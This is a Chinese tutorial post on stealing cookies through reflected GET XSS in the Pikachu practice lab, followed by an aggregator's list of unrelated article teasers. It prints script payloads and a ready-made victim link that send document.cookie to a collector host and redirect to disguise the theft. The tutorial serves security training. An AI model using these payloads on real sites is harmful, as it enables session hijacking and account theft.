4.XSS-反射型(get)利用:获取cookie

GET反射型XSS利用:获取cookie

在这里插入图片描述

修改一下配置文件\pikachu\pkxss\xcookie\cookie.php
我这里将对应的IP地址修改为本地pikachu的主站IP地址,这样给用户造成一种正常视觉上的欺骗,容易上当。重定向到pikachu主页面
在这里插入图片描述

基于IP搭建的pkxss平台(入侵者的IP地址)

<script>document.location = 'http://192.168.2.160/pikachu/pkxss/xcookie/cookie.php?cookie=' + document.cookie;</script>

我这里基于域名搭建的pkxss平台

<script>document.location = 'http://www.pikachu.net/pkxss/xcookie/cookie.php?cookie=' + document.cookie;</script>

输入基于域名的搭建的pkxss,在搜索框里输入链接
在这里插入图片描述

在皮卡丘里面的xss后台进入cookie收集
在这里插入图片描述

就能获取到用户的IP,cookie值,refer二,ua等相关信息
在这里插入图片描述

可以将referer的链接发送给对应的要攻击的用户

http://www.pikachu.net/vul/xss/xss_reflected_get.php?message=%3Cscript%3Edocument.location+%3D+%27http%3A%2F%2Fwww.pikachu.net%2Fpkxss%2Fxcookie%2Fcookie.php%3Fcookie%3D%27+%2B+document.cookie%3B%3C%2Fscript%3E&submit=submit

如下获取相关数据对应的信息
在这里插入图片描述

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/pingmian/32437.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

Python中的多线程实现与GIL(全局解释器锁)的影响

Python中的多线程实现与GIL(全局解释器锁)的影响

Python中的多线程实现与GIL&#xff08;全局解释器锁&#xff09;的影响 在Python编程中&#xff0c;多线程是一种常见的并发编程技术&#xff0c;它允许程序同时执行多个任务。然而&#xff0c;Python的全局解释器锁&#xff08;GIL&#xff09;对多线程的性能和并发性有着显…
阅读更多...
合并有序链表

合并有序链表

合并有序链表 图解代码如下 图解 虽然很复杂&#xff0c;但能够很好的理解怎么使用链表&#xff0c;以及对链表的指针类理解 代码如下 Node* merge_list_two_pointer(List& list1, List& list2) {Node* new_head1 list1.head;Node* new_head2 list2.head;Node* s…
阅读更多...
激光气体热值分析仪在线干法取样预处理装置制备方法

激光气体热值分析仪在线干法取样预处理装置制备方法

激光气体热值分析仪在线干法取样预处理装置制备方法 一、项目提出前状况: 在冶金企业产生大量的燃气副产品,主要有高炉煤气、转炉煤气、焦炉煤气,这些二次能源的高效利用是企业降本增效的重要途径。燃气热值是燃气最主要的质量指标,热值准确检测对燃气科学配比和有效利用…
阅读更多...
认识微服务

认识微服务

单体架构 单体架构&#xff1a;将业务的所有功能集中在一个项目中开发&#xff0c;打成一个包部署。 优点&#xff1a; 架构简单部署成本低缺点&#xff1a; 团队协作成本高系统发布效率低系统可用性差 总结&#xff1a; 单体架构适合开发功能相对简单&#xff0c;规模较小…
阅读更多...
【从0实现React18】 (二) JSX 的转换 jsx到底是什么?React是如何把jsx转换为ReactElement?

【从0实现React18】 (二) JSX 的转换 jsx到底是什么?React是如何把jsx转换为ReactElement?

react项目结构 React(宿主环境的公用方法)React-reconciler(协调器的实现&#xff0c;宿主环境无关)各种宿主环境的包shared(公用辅助方法&#xff0c;宿主环境无关) 当前实现的JSX转换属于 react****包 初始化react包 先创建react package并初始化 更新package.json文件&a…
阅读更多...
秋招的复习随想

秋招的复习随想

文章目录 第一版第二版第三版 第一版 研二准备秋招了&#xff0c;真想对研一的我说&#xff01; 课这个东西&#xff0c;还看不出来老师到底是想不想教吗&#xff1f;大部分都是浪费时间&#xff0c;下课让你交论文&#xff0c;实际论文都不会看&#xff0c;都是助教改的。然后…
阅读更多...
微服务——重复消费(幂等解决方案)

微服务——重复消费(幂等解决方案)

目录 一、唯一ID机制二、幂等性设计三、状态检查机制四、利用缓存和消息队列五、分布式锁总结 在微服务中&#xff0c;防止重复消费的核心思想是通过设计使得操作一次与多次产生相同的效果&#xff0c;并为每次操作生成唯一的ID。这样&#xff0c;即使在消息被重复发送的情况下…
阅读更多...
K8S - 实现statefulset 有状态service的灰度发布

K8S - 实现statefulset 有状态service的灰度发布

什么是灰度发布 Canary Release 参考 理解 什么是 滚动更新&#xff0c;蓝绿部署&#xff0c;灰度发布 以及它们的区别 配置partition in updateStrategy/rollingUpdate 这次我为修改了 statefulset 的1个yaml file statefulsets/stateful-nginx-without-pvc.yaml: --- apiVe…
阅读更多...
Android - 跳转到应用商店进行应用打分功能实现

Android - 跳转到应用商店进行应用打分功能实现

2.将过滤出的这些应用商店展示给用户&#xff0c;如果没有安装任何相关应用商店则提示用户“暂无安装相关应用商店”。 3.用户点击了某应用商店之后&#xff0c;则跳转到该应用商店的APP详情页。 4.下面列出了比较核心的代码&#xff0c;可进行参考。 /** 过滤出已经安装的包…
阅读更多...
工业用焦炉集气管压力控制状态远程预警方法

工业用焦炉集气管压力控制状态远程预警方法

工业用焦炉集气管压力控制状态远程预警方法 一、项目提出前状况: 焦化厂焦炉集气管压力是炼焦生产过程中重要的工艺参数(其控制目标80~120Pa),焦炉集气管压力的稳定是焦炉正常生产的重要保证。集气管压力过高会造成焦炉炉体冒烟冒火,污染环境,对操作人员的人身安全构成…
阅读更多...
不同交换机之间相同VLAN间主机通信

不同交换机之间相同VLAN间主机通信

1、搭建网络拓扑 搭建拓扑&#xff0c;分配IP地址&#xff0c;划分vlan&#xff0c;分配端口 2、配置交换机 //进入全局配置模式 Switch>enable Switch#config terminal Enter configuration commands, one per line. End with CNTL/Z. Switch(config)#hostname SW1 …
阅读更多...
ubuntu 20.04 访问csdn报错 Secure connection failed

ubuntu 20.04 访问csdn报错 Secure connection failed

打扰了&#xff0c;csdn服务器的问题&#xff0c;和源没关系&#xff0c;后面又重新测试了一下。刚好那一刻网站连上了。 暂时没有好办法&#xff0c;等待一段时间就连上了&#xff0c;改host似乎也不太行。 问题原因&#xff1a; 我一边更新源 sudo apt update & apt up…
阅读更多...
35.netty模拟redis客户端向redis服务端写数据

35.netty模拟redis客户端向redis服务端写数据

redis命令:set name zhangsan *3 $3 set $4 name $8 zhangsan *3 表示有三个元素 $3表示 set 命令的长度,3个字节 $4 表示name的长度,4个字节 $8 表示zhangsan的长度,8个字节 package com.xkj.nian;import io.netty.bootstrap.Bootstrap; import io.netty.buffer.ByteB…
阅读更多...
【专业英语 复习】第4章 System Software

【专业英语 复习】第4章 System Software

1. Most operating systems support the ability to switch between different applications. This is called ____. A driving B multitasking C translating D booting 正确答案&#xff1a;B &#xff08;多任务处理&#xff09; 大多数操作系统支持在不同应用程…
阅读更多...
OPENCV中0x00007FFE5F35F39C发生异常

OPENCV中0x00007FFE5F35F39C发生异常

原因&#xff1a;读取图片时已经为灰度图像&#xff0c;又进行了一次灰度处理cvtColor 解决方法&#xff1a;如上图所示&#xff0c;将cv::imread的第二个参数改为cv::IMREAD_COLOR&#xff1b;或者保留cv::IMREAD_GRAYSCALE&#xff0c;删去后面的cv::cvtColor
阅读更多...
git-pull详解

git-pull详解

NAME git-pull - Fetch from and integrate with another repository or a local branch SYNOPSIS git pull [<options>] [<repository> [<refspec>…​]] DESCRIPTION Incorporates changes from a remote repository into the current branch. If the…
阅读更多...
js如何把数组网页元素按分隔符返回字符串?document.getElementsByClassName(“class1“)

js如何把数组网页元素按分隔符返回字符串?document.getElementsByClassName(“class1“)

要将数组中的网页元素按分隔符返回字符串&#xff0c;你可以使用 JavaScript 中的 Array.prototype.map() 方法和 Array.prototype.join() 方法。 首先&#xff0c;使用 document.getElementsByClassName("class1") 获取到指定类名的所有网页元素&#xff0c;并将其…
阅读更多...
ChatTTS,智能聊天机器人,深度学习技术!\n\n标题建议ChatTTS智能聊天机器人的开源之旅。

ChatTTS,智能聊天机器人,深度学习技术!\n\n标题建议ChatTTS智能聊天机器人的开源之旅。

**项目介绍**&#xff1a;  ChatTTS是一个基于自然语言处理和深度学习技术的智能聊天机器人项目。它利用了开源的Gensim和NLTK库进行文本分析&#xff0c;并结合了TensorFlow或PyTorch等深度学习框架&#xff0c;构建了一个强大的自然语言处理模型。ChatTTS能够理解并生成人类…
阅读更多...
UE开发随笔------json与struct互相转换(FJsonObjectConverter)

UE开发随笔------json与struct互相转换(FJsonObjectConverter)

UStruct定义&#xff1a; USTRUCT() struct FHeartBeatMsg {GENERATED_BODY() public:UPROPERTY()FString pcCode TEXT("");UPROPERTY()FString deviceType TEXT("");UPROPERTY()FString messageType TEXT("");UPROPERTY()FString content …
阅读更多...
LLm与微调入门

LLm与微调入门

两种 Finetune 范式 增量预训练微调 使用场景&#xff1a;让基座模型学习到一些新知识&#xff0c;如某个垂类领域的常识 训练数据&#xff1a;文章、书籍、代码等 指令跟随微调 使用场景&#xff1a;让模型学会对话模板&#xff0c;根据人类指令进行对话 训练数据&#…
阅读更多...
最新文章

Copyright @ 2022~2023